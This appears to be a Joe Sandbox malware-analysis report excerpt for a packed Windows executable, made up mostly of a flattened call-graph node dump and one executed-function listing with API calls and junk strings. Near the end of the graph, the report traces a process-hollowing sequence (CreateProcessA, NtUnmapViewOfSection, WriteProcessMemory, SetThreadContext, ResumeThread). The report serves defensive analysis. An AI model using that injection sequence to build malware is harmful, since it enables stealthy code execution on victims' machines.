9063->9060 9066->9060 9067->8090 9072 40979c __calloc_impl 67 API calls 9071->9072 9073 4056c1 9072->9073 9074 4056dd 9073->9074 9075 407d04 _puts 67 API calls 9073->9075 9074->8088 9076 4056d4 9075->9076 9076->9074 9077 407d04 _puts 67 API calls 9076->9077 9077->9074 9679 405750 9078->9679 9080 403e13 9080->8093 9084 40598f _puts 9081->9084 9082 4059a3 9083 407d04 _puts 67 API calls 9082->9083 9085 4059a8 9083->9085 9084->9082 9087 405a2d _puts 9084->9087 9088 40957a __fileno 67 API calls 9084->9088 9086 407c9c _puts 6 API calls 9085->9086 9090 4059b8 _puts 9086->9090 9730 409125 9087->9730 9092 4059d6 9088->9092 9090->8097 9091 405a3d _puts 9735 40a842 9091->9735 9092->9082 9092->9087 9094 405a50 _puts _strlen 9742 40a912 9094->9742 9097 405a83 _puts 9775 40a8de 9097->9775 9099 405a70 _puts 9099->9097 9754 4091c2 9099->9754 9103 4055a7 _puts 9102->9103 9104 4055da 9103->9104 9105 4055ba 9103->9105 9106 4090e4 __lock_file 68 API calls 9104->9106 9107 407d04 _puts 67 API calls 9105->9107 9108 4055e0 9106->9108 9109 4055bf 9107->9109 9111 40957a __fileno 67 API calls 9108->9111 9112 40565a 9108->9112 9110 407c9c _puts 6 API calls 9109->9110 9116 4055cf _puts 9110->9116 9118 4055f0 9111->9118 9113 40566b 9112->9113 9115 4091c2 __flsbuf 101 API calls 9112->9115 9828 40569f 9113->9828 9115->9113 9116->8099 9117 407d04 _puts 67 API calls 9119 40564a 9117->9119 9118->9112 9118->9117 9120 407c9c _puts 6 API calls 9119->9120 9120->9112 9121->9042 9123 404028 9122->9123 9124 4040ec 9122->9124 9123->9124 9125 40403c 13 API calls 9123->9125 9169 403e45 9123->9169 9124->9059 9125->9123 9128 4044f4 9127->9128 9176 404530 9128->9176 9130 404504 9180 40451c 9130->9180 9133 405bba 9134 405bc6 _puts 9133->9134 9135 405bf7 9134->9135 9136 405bda 9134->9136 9142 405bef _puts 9135->9142 9355 4090e4 9135->9355 9137 407d04 _puts 67 API calls 9136->9137 9139 405bdf 9137->9139 9141 407c9c _puts 6 API calls 9139->9141 9141->9142 9142->9045 9147 403cdf 9146->9147 9148 4051a6 std::exception::exception 67 API calls 9146->9148 9149 403cec 9147->9149 9148->9147 9150 405273 9149->9150 9151 404218 9150->9151 9152 407ece ___convertcp 67 API calls 9150->9152 9153 405730 9151->9153 9152->9151 9154 405717 9153->9154 9602 409b9b 9154->9602 9158 405040 9157->9158 9159 405047 9157->9159 9160 40761c __NMSG_WRITE 67 API calls 9158->9160 9624 40745f 9159->9624 9160->9159 9164 405130 9648 405efc 9164->9648 9165 405058 _memset 9165->9164 9167 4050f0 SetUnhandledExceptionFilter UnhandledExceptionFilter 9165->9167 9167->9164 9170 403e81 9169->9170 9171 403e6b RemoveDirectoryA GlobalAddAtomA 9169->9171 9172 403edf SearchPathA DebugActiveProcess FreeEnvironmentStringsW ReadConsoleInputW 9170->9172 9173 403f71 GetGeoInfoW 9170->9173 9174 403f93 FindFirstVolumeMountPointA GetVolumePathNameA 9170->9174 9175 403ff2 9170->9175 9171->9170 9172->9170 9173->9170 9174->9170 9175->9123 9177 404557 9176->9177 9178 40453a 9176->9178 9177->9130 9178->9177 9184 40485e 9178->9184 9181 404524 9180->9181 9206 404585 9181->9206 9183 4041f4 9183->9133 9185 404867 9184->9185 9188 404907 9185->9188 9191 403da7 9188->9191 9194 403d5c 9191->9194 9197 405871 9194->9197 9196 403d73 9196->9177 9200 405885 _memset 9197->9200 9204 405881 ___crtGetEnvironmentStringsA 9197->9204 9198 40588a 9199 407d04 _puts 67 API calls 9198->9199 9201 40588f 9199->9201 9200->9198 9202 4058d4 9200->9202 9200->9204 9203 407c9c _puts 6 API calls 9201->9203 9202->9204 9205 407d04 _puts 67 API calls 9202->9205 9203->9204 9204->9196 9205->9201 9207 404590 9206->9207 9208 4045b1 9207->9208 9209 404594 9207->9209 9228 40468f 9208->9228 9215 40460d 9209->9215 9212 4045af 9212->9183 9213 4045b9 9213->9212 9214 40485e 67 API calls 9213->9214 9214->9212 9216 40461f 9215->9216 9218 404628 9216->9218 9234 404e3d 9216->9234 9219 404641 9218->9219 9220 404657 9218->9220 9246 4046fe 9219->9246 9222 40468f 75 API calls 9220->9222 9226 40465c 9222->9226 9223 40464c 9224 4046fe 75 API calls 9223->9224 9225 404655 9224->9225 9225->9212 9226->9225 9227 40485e 67 API calls 9226->9227 9227->9225 9229 404694 9228->9229 9230 40469d 9229->9230 9302 404cf1 9229->9302 9232 4046ac 9230->9232 9310 404765 9230->9310 9232->9213 9235 404e49 __EH_prolog3 9234->9235 9252 404e16 9235->9252 9241 404e74 9242 404e3d std::_String_base::_Xlen 75 API calls 9241->9242 9243 404e8c 9241->9243 9242->9243 9245 404ecb std::_String_base::_Xlen 9243->9245 9262 404a7b 9243->9262 9245->9218 9247 404709 9246->9247 9250 40470e 9246->9250 9248 404e3d std::_String_base::_Xlen 75 API calls 9247->9248 9248->9250 9249 404744 9249->9223 9250->9249 9292 404882 9250->9292 9253 404e2c std::_String_base::_Xlen 9252->9253 9265 404df5 9253->9265 9256 404ca2 9278 404bd0 9256->9278 9258 404cb2 9259 40623b 9258->9259 9260 406270 RaiseException 9259->9260 9261 406264 9259->9261 9260->9241 9261->9260 9286 404a0b 9262->9286 9266 404e05 _strlen 9265->9266 9269 404d81 9266->9269 9268 404e11 9268->9256 9270 404d93 std::_String_base::_Xlen 9269->9270 9271 404db5 9270->9271 9272 404d97 9270->9272 9273 404d29 std::runtime_error::runtime_error 75 API calls 9271->9273 9274 404ee5 std::runtime_error::runtime_error 75 API calls 9272->9274 9276 404dc1 9273->9276 9275 404db3 std::_String_base::_Xlen 9274->9275 9275->9268 9276->9275 9277 404a5c std::runtime_error::~runtime_error 67 API calls 9276->9277 9277->9275 9279 404bdc __EH_prolog3 std::runtime_error::runtime_error 9278->9279 9282 404f7d 9279->9282 9281 404bfb std::runtime_error::runtime_error 9281->9258 9283 404f93 std::_String_base::_Xlen 9282->9283 9284 404ee5 std::runtime_error::runtime_error 75 API calls 9283->9284 9285 404fa1 9284->9285 9285->9281 9289 404955 9286->9289 9290 405138 char_traits 67 API calls 9289->9290 9291 40496b 9290->9291 9291->9245 9293 40488b 9292->9293 9296 40491f 9293->9296 9299 403dc0 9296->9299 9300 403d78 67 API calls 9299->9300 9301 403dd1 9300->9301 9301->9249 9303 404cfd __EH_prolog3 9302->9303 9304 404e16 std::_String_base::_Xlen 75 API calls 9303->9304 9305 404d0a 9304->9305 9318 404c53 9305->9318 9308 40623b __CxxThrowException@8 RaiseException 9309 404d28 9308->9309 9312 40476f __EH_prolog 9310->9312 9321 404853 9312->9321 9313 404814 9315 404530 67 API calls 9313->9315 9314 4047c3 9314->9313 9317 40485e 67 API calls 9314->9317 9316 40481d 9315->9316 9316->9232 9317->9313 9319 404bd0 std::runtime_error::runtime_error 75 API calls 9318->9319 9320 404c63 9319->9320 9320->9308 9322 4048a6 9321->9322 9323 4048b0 9322->9323 9324 4048ca 9322->9324 9331 405f99 9323->9331 9343 403d16 9324->9343 9329 40623b __CxxThrowException@8 RaiseException 9330 4048e2 9329->9330 9333 405fa3 9331->9333 9332 407e04 _malloc 67 API calls 9332->9333 9333->9332 9334 4048bb 9333->9334 9335 40b54a __calloc_impl 6 API calls 9333->9335 9338 405fbf std::bad_alloc::bad_alloc 9333->9338 9334->9314 9335->9333 9336 405fe5 9346 4048e3 9336->9346 9338->9336 9340 40b17b __cinit 74 API calls 9338->9340 9340->9336 9341 40623b __CxxThrowException@8 RaiseException 9342 405ffd 9341->9342 9349 4051a6 9343->9349 9347 405216 std::exception::exception 67 API calls 9346->9347 9348 4048f1 9347->9348 9348->9341 9350 403d25 9349->9350 9351 4051bf _strlen 9349->9351 9350->9329 9352 407e04 _malloc 67 API calls 9351->9352 9353 4051ce 9352->9353 9353->9350 9354 407d4d _strcpy_s 67 API calls 9353->9354 9354->9350 9356 4090f6 9355->9356 9357 409118 EnterCriticalSection 9355->9357 9356->9357 9359 4090fe 9356->9359 9358 405c0f 9357->9358 9361 405b43 9358->9361 9360 40b021 __lock 67 API calls 9359->9360 9360->9358 9362 405b73 9361->9362 9363 405b57 9361->9363 9369 405b6c 9362->9369 9380 40ad12 9362->9380 9364 407d04 _puts 67 API calls 9363->9364 9365 405b5c 9364->9365 9367 407c9c _puts 6 API calls 9365->9367 9367->9369 9377 405c2e 9369->9377 9375 405b93 9375->9369 9376 407ece ___convertcp 67 API calls 9375->9376 9376->9369 9595 409157 9377->9595 9379 405c34 9379->9142 9381 405b7f 9380->9381 9382 40ad2b 9380->9382 9386 40ace1 9381->9386 9382->9381 9383 40957a __fileno 67 API calls 9382->9383 9384 40ad46 9383->9384 9419 40e49e 9384->9419 9387 40acf1 9386->9387 9388 405b87 9386->9388 9387->9388 9389 407ece ___convertcp 67 API calls 9387->9389 9390 40957a 9388->9390 9389->9388 9391 405b8d 9390->9391 9392 409589 9390->9392 9396 40ac14 9391->9396 9393 407d04 _puts 67 API calls 9392->9393 9394 40958e 9393->9394 9395 407c9c _puts 6 API calls 9394->9395 9395->9391 9397 40ac20 _puts 9396->9397 9398 40ac28 9397->9398 9401 40ac43 9397->9401 9399 407d17 __locking 67 API calls 9398->9399 9402 40ac2d 9399->9402 9400 40ac51 9403 407d17 __locking 67 API calls 9400->9403 9401->9400 9404 40ac92 9401->9404 9405 407d04 _puts 67 API calls 9402->9405 9406 40ac56 9403->9406 9407 40f426 ___lock_fhandle 68 API calls 9404->9407 9416 40ac35 _puts 9405->9416 9408 407d04 _puts 67 API calls 9406->9408 9409 40ac98 9407->9409 9410 40ac5d 9408->9410 9411 40acb3 9409->9411 9412 40aca5 9409->9412 9413 407c9c _puts 6 API calls 9410->9413 9415 407d04 _puts 67 API calls 9411->9415 9567 40ab78 9412->9567 9413->9416 9417 40acad 9415->9417 9416->9375 9582 40acd7 9417->9582 9420 40e4aa _puts 9419->9420 9421 40e4b2 9420->9421 9422 40e4cd 9420->9422 9444 407d17 9421->9444 9423 40e4db 9422->9423 9428 40e51c 9422->9428 9425 407d17 __locking 67 API calls 9423->9425 9427 40e4e0 9425->9427 9430 407d04 _puts 67 API calls 9427->9430 9447 40f426 9428->9447 9429 407d04 _puts 67 API calls 9438 40e4bf _puts 9429->9438 9432 40e4e7 9430->9432 9434 407c9c _puts 6 API calls 9432->9434 9433 40e522 9435 40e545 9433->9435 9436 40e52f 9433->9436 9434->9438 9437 407d04 _puts 67 API calls 9435->9437 9457 40dd6b 9436->9457 9440 40e54a 9437->9440 9438->9381 9442 407d17 __locking 67 API calls 9440->9442 9441 40e53d 9516 40e570 9441->9516 9442->9441 9445 40a4f3 __getptd_noexit 67 API calls 9444->9445 9446 407d1c 9445->9446 9446->9429 9448 40f432 _puts 9447->9448 9449 40f48d 9448->9449 9452 40b021 __lock 67 API calls 9448->9452 9450 40f492 EnterCriticalSection 9449->9450 9451 40f4af _puts 9449->9451 9450->9451 9451->9433 9453 40f45e 9452->9453 9454 40f475 9453->9454 9455 40b4db ___lock_fhandle InitializeCriticalSectionAndSpinCount 9453->9455 9519 40f4bd 9454->9519 9455->9454 9458 40dd7a __write_nolock 9457->9458 9459 40ddd3 9458->9459 9460 40ddac 9458->9460 9503 40dda1 9458->9503 9463 40de3b 9459->9463 9464 40de15 9459->9464 9462 407d17 __locking 67 API calls 9460->9462 9461 40667b _$I10_OUTPUT 5 API calls 9465 40e49c 9461->9465 9466 40ddb1 9462->9466 9468 40de4f 9463->9468 9523 40dbcd 9463->9523 9467 407d17 __locking 67 API calls 9464->9467 9465->9441 9469 407d04 _puts 67 API calls 9466->9469 9470 40de1a 9467->9470 9533 40e5c3 9468->9533 9472 40ddb8 9469->9472 9475 407d04 _puts 67 API calls 9470->9475 9476 407c9c _puts 6 API calls 9472->9476 9474 40de5a 9477 40e100 9474->9477 9482 40a56c __getptd 67 API calls 9474->9482 9478 40de23 9475->9478 9476->9503 9480 40e110 9477->9480 9481 40e3cf WriteFile 9477->9481 9479 407c9c _puts 6 API calls 9478->9479 9479->9503 9483 40e1ee 9480->9483 9505 40e124 9480->9505 9485 40e402 GetLastError 9481->9485 9509 40e0e2 9481->9509 9484 40de75 GetConsoleMode 9482->9484 9489 40e2ce 9483->9489 9507 40e1fd 9483->9507 9484->9477 9486 40dea0 9484->9486 9485->9509 9486->9477 9487 40deb2 GetConsoleCP 9486->9487 9487->9509 9514 40ded5 9487->9514 9488 407d04 _puts 67 API calls 9493 40e470 9488->9493 9491 40e44d 9489->9491 9494 40e334 WideCharToMultiByte 9489->9494 9498 40e36b WriteFile 9489->9498 9489->9509 9490 40e420 9495 40e42b 9490->9495 9496 40e43f 9490->9496 9491->9488 9491->9503 9492 40e192 WriteFile 9492->9485 9492->9505 9501 407d17 __locking 67 API calls 9493->9501 9494->9485 9494->9498 9497 407d04 _puts 67 API calls 9495->9497 9545 407d2a 9496->9545 9502 40e430 9497->9502 9498->9489 9504 40e3a2 GetLastError 9498->9504 9499 40e272 WriteFile 9499->9485 9499->9507 9501->9503 9506 407d17 __locking 67 API calls 9502->9506 9503->9461 9504->9489 9505->9491 9505->9492 9505->9509 9506->9503 9507->9491 9507->9499 9507->9509 9509->9490 9509->9491 9509->9503 9510 41011b 11 API calls __putwch_nolock 9510->9514 9511 40df81 WideCharToMultiByte 9511->9509 9513 40dfb2 WriteFile 9511->9513 9512 4102f7 79 API calls __fassign 9512->9514 9513->9485 9513->9514 9514->9485 9514->9509 9514->9510 9514->9511 9514->9512 9515 40e006 WriteFile 9514->9515 9542 410349 9514->9542 9515->9485 9515->9514 9566 40f4c6 LeaveCriticalSection 9516->9566 9518 40e578 9518->9438 9522 40af47 LeaveCriticalSection 9519->9522 9521 40f4c4 9521->9449 9522->9521 9550 40f3af 9523->9550 9525 40dbeb 9526 40dbf3 9525->9526 9527 40dc04 SetFilePointer 9525->9527 9528 407d04 _puts 67 API calls 9526->9528 9529 40dc1c GetLastError 9527->9529 9530 40dbf8 9527->9530 9528->9530 9529->9530 9531 40dc26 9529->9531 9530->9468 9532 407d2a __dosmaperr 67 API calls 9531->9532 9532->9530 9534 40e5d0 9533->9534 9536 40e5df 9533->9536 9535 407d04 _puts 67 API calls 9534->9535 9537 40e5d5 9535->9537 9538 40e603 9536->9538 9539 407d04 _puts 67 API calls 9536->9539 9537->9474 9538->9474 9540 40e5f3 9539->9540 9541 407c9c _puts 6 API calls 9540->9541 9541->9538 9563 410311 9542->9563 9546 407d17 __locking 67 API calls 9545->9546 9547 407d35 __dosmaperr 9546->9547 9548 407d04 _puts 67 API calls 9547->9548 9549 407d48 9548->9549 9549->9503 9551 40f3d4 9550->9551 9552 40f3bc 9550->9552 9554 407d17 __locking 67 API calls 9551->9554 9560 40f419 9551->9560 9553 407d17 __locking 67 API calls 9552->9553 9555 40f3c1 9553->9555 9557 40f402 9554->9557 9556 407d04 _puts 67 API calls 9555->9556 9558 40f3c9 9556->9558 9559 407d04 _puts 67 API calls 9557->9559 9558->9525 9561 40f409 9559->9561 9560->9525 9562 407c9c _puts 6 API calls 9561->9562 9562->9560 9564 4098ba _LocaleUpdate::_LocaleUpdate 77 API calls 9563->9564 9565 410324 9564->9565 9565->9514 9566->9518 9568 40f3af __lseeki64_nolock 67 API calls 9567->9568 9571 40ab88 9568->9571 9569 40abde 9585 40f329 9569->9585 9571->9569 9572 40abbc 9571->9572 9575 40f3af __lseeki64_nolock 67 API calls 9571->9575 9572->9569 9573 40f3af __lseeki64_nolock 67 API calls 9572->9573 9576 40abc8 CloseHandle 9573->9576 9578 40abb3 9575->9578 9576->9569 9580 40abd4 GetLastError 9576->9580 9577 40ac08 9577->9417 9579 40f3af __lseeki64_nolock 67 API calls 9578->9579 9579->9572 9580->9569 9581 407d2a __dosmaperr 67 API calls 9581->9577 9594 40f4c6 LeaveCriticalSection 9582->9594 9584 40acdf 9584->9416 9586 40f395 9585->9586 9587 40f33a 9585->9587 9588 407d04 _puts 67 API calls 9586->9588 9587->9586 9593 40f365 9587->9593 9589 40f39a 9588->9589 9590 407d17 __locking 67 API calls 9589->9590 9591 40abe6 9590->9591 9591->9577 9591->9581 9592 40f385 SetStdHandle 9592->9591 9593->9591 9593->9592 9594->9584 9596 409187 LeaveCriticalSection 9595->9596 9597 409168 9595->9597 9596->9379 9597->9596 9598 40916f 9597->9598 9601 40af47 LeaveCriticalSection 9598->9601 9600 409184 9600->9379 9601->9600 9605 409941 9602->9605 9606 4098ba _LocaleUpdate::_LocaleUpdate 77 API calls 9605->9606 9609 409956 9606->9609 9607 409968 9608 407d04 _puts 67 API calls 9607->9608 9610 40996d 9608->9610 9609->9607 9612 4099a5 9609->9612 9611 407c9c _puts 6 API calls 9610->9611 9616 40421f 9611->9616 9614 4099ea 9612->9614 9617 40f183 9612->9617 9615 407d04 _puts 67 API calls 9614->9615 9614->9616 9615->9616 9616->9061 9618 4098ba _LocaleUpdate::_LocaleUpdate 77 API calls 9617->9618 9619 40f197 9618->9619 9620 40f1a4 9619->9620 9621 410311 __isleadbyte_l 77 API calls 9619->9621 9620->9612 9622 40f1cc 9621->9622 9623 41092f ___crtGetStringTypeA 91 API calls 9622->9623 9623->9620 9625 40a320 __decode_pointer 6 API calls 9624->9625 9626 40504d 9625->9626 9626->9165 9627 40746c 9626->9627 9628 407478 _puts 9627->9628 9629 40749f 9628->9629 9631 4074b5 9628->9631 9632 4074d4 9628->9632 9635 40749b 9628->9635 9630 40a4f3 __getptd_noexit 67 API calls 9629->9630 9636 4074a4 _siglookup 9630->9636 9633 40a320 __decode_pointer 6 API calls 9631->9633 9632->9631 9634 4074e3 9632->9634 9633->9636 9637 407d04 _puts 67 API calls 9634->9637 9635->9629 9635->9634 9639 40754a 9636->9639 9641 405efc _raise 67 API calls 9636->9641 9647 4074ad _puts 9636->9647 9638 4074e8 9637->9638 9640 407c9c _puts 6 API calls 9638->9640 9642 40b021 __lock 67 API calls 9639->9642 9643 407555 9639->9643 9640->9647 9641->9639 9642->9643 9644 40a317 _doexit 6 API calls 9643->9644 9645 40758a 9643->9645 9644->9645 9651 4075e0 9645->9651 9647->9165 9656 405dba 9648->9656 9650 405137 9652 4075e6 9651->9652 9653 4075ed 9651->9653 9655 40af47 LeaveCriticalSection 9652->9655 9653->9647 9655->9653 9657 405dc6 _puts 9656->9657 9658 40b021 __lock 67 API calls 9657->9658 9659 405dcd 9658->9659 9661 40a320 __decode_pointer 6 API calls 9659->9661 9663 405e86 __initterm 9659->9663 9664 405e04 9661->9664 9673 405ed1 9663->9673 9664->9663 9667 40a320 __decode_pointer 6 API calls 9664->9667 9665 405ece _puts 9665->9650 9672 405e19 9667->9672 9668 405ec5 9669 405cca _doexit 3 API calls 9668->9669 9669->9665 9670 40a317 6 API calls _doexit 9670->9672 9671 40a320 6 API calls __decode_pointer 9671->9672 9672->9663 9672->9670 9672->9671 9674 405ed7 9673->9674 9675 405eb2 9673->9675 9678 40af47 LeaveCriticalSection 9674->9678 9675->9665 9677 40af47 LeaveCriticalSection 9675->9677 9677->9668 9678->9675 9680 409e68 _ldexp __ctrlfp 9679->9680 9681 40575d 9679->9681 9683 409ed5 __floor_pentium4 9680->9683 9686 409eb2 9680->9686 9687 409ec2 __ctrlfp 9680->9687 9681->9680 9682 40578e 9681->9682 9688 4057d8 9682->9688 9690 409bb8 9682->9690 9683->9687 9706 408d58 9683->9706 9699 408ca2 9686->9699 9687->9080 9688->9080 9691 409bee 9690->9691 9694 409bf9 9690->9694 9692 40a320 __decode_pointer 6 API calls 9691->9692 9692->9694 9693 409cd0 9695 409c8c 9693->9695 9697 407d04 _puts 67 API calls 9693->9697 9694->9693 9694->9695 9696 409c4a 9694->9696 9695->9688 9696->9695 9698 407d04 _puts 67 API calls 9696->9698 9697->9695 9698->9695 9700 408cb0 9699->9700 9701 408cd8 9699->9701 9715 408c02 9700->9715 9703 407d04 _puts 67 API calls 9701->9703 9705 408cdd __ctrlfp 9703->9705 9704 408cd3 9704->9687 9705->9687 9707 408d8e __raise_exc __handle_exc __except1 9706->9707 9708 408df6 9707->9708 9709 408dcf 9707->9709 9710 408ba1 __87except 67 API calls 9708->9710 9711 408c02 __umatherr 67 API calls 9709->9711 9712 408df1 __ctrlfp 9710->9712 9711->9712 9713 40667b _$I10_OUTPUT 5 API calls 9712->9713 9714 408e1a 9713->9714 9714->9687 9716 408c0c 9715->9716 9717 408c85 __ctrlfp 9716->9717 9720 408c27 __87except __ctrlfp 9716->9720 9718 408ba1 __87except 67 API calls 9717->9718 9719 408c9a 9718->9719 9719->9704 9722 408c75 9720->9722 9723 408ba1 9720->9723 9722->9704 9724 408bc1 9723->9724 9726 408bac 9723->9726 9725 407d04 _puts 67 API calls 9724->9725 9727 408bc6 9725->9727 9726->9727 9728 407d04 _puts 67 API calls 9726->9728 9727->9722 9729 408bb9 9728->9729 9729->9722 9731 409132 9730->9731 9732 409148 EnterCriticalSection 9730->9732 9733 40b021 __lock 67 API calls 9731->9733 9732->9091 9734 40913b 9733->9734 9734->9091 9736 40957a __fileno 67 API calls 9735->9736 9737 40a851 9736->9737 9738 40e5c3 __write_nolock 67 API calls 9737->9738 9740 40a857 _puts 9738->9740 9739 40a8a4 9739->9094 9740->9739 9741 40bdce __malloc_crt 67 API calls 9740->9741 9741->9739 9744 40a924 9742->9744 9748 40a945 9742->9748 9743 40a930 9745 407d04 _puts 67 API calls 9743->9745 9744->9743 9744->9748 9752 40a963 ___crtGetEnvironmentStringsA 9744->9752 9746 40a935 9745->9746 9747 407c9c _puts 6 API calls 9746->9747 9747->9748 9748->9099 9749 4091c2 __flsbuf 101 API calls 9749->9752 9750 40ad12 __flush 101 API calls 9750->9752 9751 40957a __fileno 67 API calls 9751->9752 9752->9748 9752->9749 9752->9750 9752->9751 9753 40e49e __locking 101 API calls 9752->9753 9753->9752 9755 40957a __fileno 67 API calls 9754->9755 9756 4091d2 9755->9756 9757 4091f4 9756->9757 9758 4091dd 9756->9758 9760 4091f8 9757->9760 9768 409205 _puts 9757->9768 9759 407d04 _puts 67 API calls 9758->9759 9769 4091e2 9759->9769 9761 407d04 _puts 67 API calls 9760->9761 9761->9769 9762 409266 9763 4092f5 9762->9763 9764 409275 9762->9764 9765 40e49e __locking 101 API calls 9763->9765 9766 40928c 9764->9766 9771 4092a9 9764->9771 9765->9769 9767 40e49e __locking 101 API calls 9766->9767 9767->9769 9768->9762 9768->9769 9770 40e5c3 __write_nolock 67 API calls 9768->9770 9772 40925b 9768->9772 9769->9097 9770->9772 9771->9769 9786 40dc52 9771->9786 9772->9762 9783 40e57a 9772->9783 9776 40a8e9 9775->9776 9777 405ab8 9775->9777 9776->9777 9778 40ad12 __flush 101 API calls 9776->9778 9779 405acf 9777->9779 9778->9777 9780 405ad4 _puts 9779->9780 9822 409193 9780->9822 9782 405adf 9782->9090 9784 40bdce __malloc_crt 67 API calls 9783->9784 9785 40e58f 9784->9785 9785->9762 9787 40dc5e _puts 9786->9787 9788 40dc8b 9787->9788 9789 40dc6f 9787->9789 9791 40dc99 9788->9791 9792 40dcba 9788->9792 9790 407d17 __locking 67 API calls 9789->9790 9794 40dc74 9790->9794 9793 407d17 __locking 67 API calls 9791->9793 9796 40dd00 9792->9796 9797 40dcda 9792->9797 9795 40dc9e 9793->9795 9798 407d04 _puts 67 API calls 9794->9798 9800 407d04 _puts 67 API calls 9795->9800 9799 40f426 ___lock_fhandle 68 API calls 9796->9799 9801 407d17 __locking 67 API calls 9797->9801 9812 40dc7c _puts 9798->9812 9802 40dd06 9799->9802 9803 40dca5 9800->9803 9804 40dcdf 9801->9804 9805 40dd13 9802->9805 9806 40dd2f 9802->9806 9807 407c9c _puts 6 API calls 9803->9807 9808 407d04 _puts 67 API calls 9804->9808 9809 40dbcd __lseeki64_nolock 69 API calls 9805->9809 9810 407d04 _puts 67 API calls 9806->9810 9807->9812 9811 40dce6 9808->9811 9813 40dd24 9809->9813 9814 40dd34 9810->9814 9815 407c9c _puts 6 API calls 9811->9815 9812->9769 9818 40dd61 9813->9818 9816 407d17 __locking 67 API calls 9814->9816 9815->9812 9816->9813 9821 40f4c6 LeaveCriticalSection 9818->9821 9820 40dd69 9820->9812 9821->9820 9823 4091a3 9822->9823 9824 4091b6 LeaveCriticalSection 9822->9824 9827 40af47 LeaveCriticalSection 9823->9827 9824->9782 9826 4091b3 9826->9782 9827->9826 9829 409157 _fputc 2 API calls 9828->9829 9830 4056a5 9829->9830 9830->9116 9831 23e9026 9832 23e9035 9831->9832 9835 23e97c6 9832->9835 9837 23e97e1 9835->9837 9836 23e97ea CreateToolhelp32Snapshot 9836->9837 9838 23e9806 Module32First 9836->9838 9837->9836 9837->9838 9839 23e9815 9838->9839 9841 23e903e 9838->9841 9842 23e9485 9839->9842 9843 23e94b0 9842->9843 9844 23e94f9 9843->9844 9845 23e94c1 VirtualAlloc 9843->9845 9844->9844 9845->9844 9846 25b0000 9849 25b0630 9846->9849 9848 25b0005 9850 25b064c 9849->9850 9852 25b1577 9850->9852 9855 25b05b0 9852->9855 9858 25b05dc 9855->9858 9856 25b061e 9857 25b05e2 GetFileAttributesA 9857->9858 9858->9856 9858->9857 9860 25b0420 9858->9860 9861 25b04f3 9860->9861 9862 25b04fa 9861->9862 9863 25b04ff CreateWindowExA 9861->9863 9862->9858 9863->9862 9864 25b0540 PostMessageA 9863->9864 9865 25b055f 9864->9865 9865->9862 9867 25b0110 VirtualAlloc GetModuleFileNameA 9865->9867 9868 25b017d CreateProcessA 9867->9868 9869 25b0414 9867->9869 9868->9869 9871 25b025f VirtualFree VirtualAlloc Wow64GetThreadContext 9868->9871 9869->9865 9871->9869 9872 25b02a9 ReadProcessMemory 9871->9872 9873 25b02e5 VirtualAllocEx NtWriteVirtualMemory 9872->9873 9874 25b02d5 NtUnmapViewOfSection 9872->9874 9875 25b033b 9873->9875 9874->9873 9876 25b039d WriteProcessMemory Wow64SetThreadContext ResumeThread 9875->9876 9877 25b0350 NtWriteVirtualMemory 9875->9877 9878 25b03fb ExitProcess 9876->9878 9877->9875

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 004043A4 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 110pipewindowCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharToOemBuffA.USER32(00000000,00000000,00000000), ref: 004043BD
                                                                                                                                                                                                      • GetMessageExtraInfo.USER32 ref: 004043C3
                                                                                                                                                                                                      • GetCharWidth32A.GDI32(00000000,00000000,00000000,00000000), ref: 004043CD
                                                                                                                                                                                                      • GetCharABCWidthsFloatW.GDI32(00000000,00000000,00000000,?), ref: 004043DB
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004043EB
                                                                                                                                                                                                      • GetNamedPipeInfo.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004043F6
                                                                                                                                                                                                      • GetConsoleAliasExesLengthA.KERNEL32 ref: 0040441F
                                                                                                                                                                                                      • _calloc.LIBCMT ref: 00404427
                                                                                                                                                                                                      • _puts.LIBCMT ref: 00404452
                                                                                                                                                                                                      • _fputc.LIBCMT ref: 0040445A
                                                                                                                                                                                                      • GlobalFindAtomW.KERNEL32(eyi), ref: 00404481
                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(zugoniwah hecaxazazanabesarekad wafaluwegog doy figafe,tutuyudojebogegifetejom tazituvenawib birecune tofovajoka cek,ducuji rapoduwowemabeda,?,00000000,hiduhitacimiluniv xilayedareheso zudofodajitilefufoce), ref: 004044C9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • tutuyudojebogegifetejom tazituvenawib birecune tofovajoka cek, xrefs: 004044BF
                                                                                                                                                                                                      • zugoniwah hecaxazazanabesarekad wafaluwegog doy figafe, xrefs: 004044C4
                                                                                                                                                                                                      • hiduhitacimiluniv xilayedareheso zudofodajitilefufoce, xrefs: 004044AF
                                                                                                                                                                                                      • ducuji rapoduwowemabeda, xrefs: 004044BA
                                                                                                                                                                                                      • Lt], xrefs: 004043B3
                                                                                                                                                                                                      • eyi, xrefs: 0040447C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Info$AliasAtomBuffConsoleErrorExesExtraFindFloatGlobalLastLengthMessageNamedPipePrivateProfileStringWidth32Widths_calloc_fputc_puts
                                                                                                                                                                                                      • String ID: Lt]$ducuji rapoduwowemabeda$eyi$hiduhitacimiluniv xilayedareheso zudofodajitilefufoce$tutuyudojebogegifetejom tazituvenawib birecune tofovajoka cek$zugoniwah hecaxazazanabesarekad wafaluwegog doy figafe
                                                                                                                                                                                                      • API String ID: 1057375116-16110241
